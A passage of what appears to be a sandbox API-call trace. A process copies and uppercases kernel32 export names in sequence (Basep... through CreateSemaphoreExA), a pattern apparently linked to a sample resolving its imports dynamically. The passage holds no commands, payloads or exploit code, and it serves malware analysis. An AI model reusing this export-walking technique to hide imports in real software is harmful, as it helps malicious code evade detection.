out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.951] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.951] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.951] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.951] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.951] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.951] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.951] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.951] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.952] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.952] lstrlenA (lpString="BEEP") returned 4 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.952] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.952] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.952] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.952] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.952] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.952] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.952] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.952] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.952] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.952] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.952] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.952] lstrlenA (lpString="CANCELIO") returned 8 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.952] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.952] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.952] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.952] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.952] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.953] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.953] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.953] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.953] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.953] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.953] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.953] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.953] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.953] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.953] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.953] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.953] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.953] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.953] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.953] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.953] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.953] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.953] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.954] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.954] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.954] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.954] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.954] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.954] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.954] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.954] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.954] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.954] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.954] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.954] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.954] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.954] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.954] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.954] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.954] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.954] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.954] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.955] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.955] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.955] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.955] lstrlenA (lpString="COPYFILEA") returned 9 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.955] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.955] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.955] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.955] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.955] lstrlenA (lpString="COPYFILEW") returned 9 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.955] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.955] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.955] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.955] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.955] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.955] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.955] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.955] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.955] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.955] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.956] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.956] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.956] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.956] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.956] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.956] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.956] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.956] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.956] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.956] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.956] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.956] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.956] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.956] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.956] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.956] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.956] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.956] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.956] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.956] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.957] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.957] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.957] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.957] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.957] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.957] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.957] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.957] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.957] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.957] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.957] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.957] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.957] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.957] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.957] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.957] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.957] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.957] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.957] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.958] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.958] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.958] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.958] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.958] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.958] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.958] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.958] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.958] lstrlenA 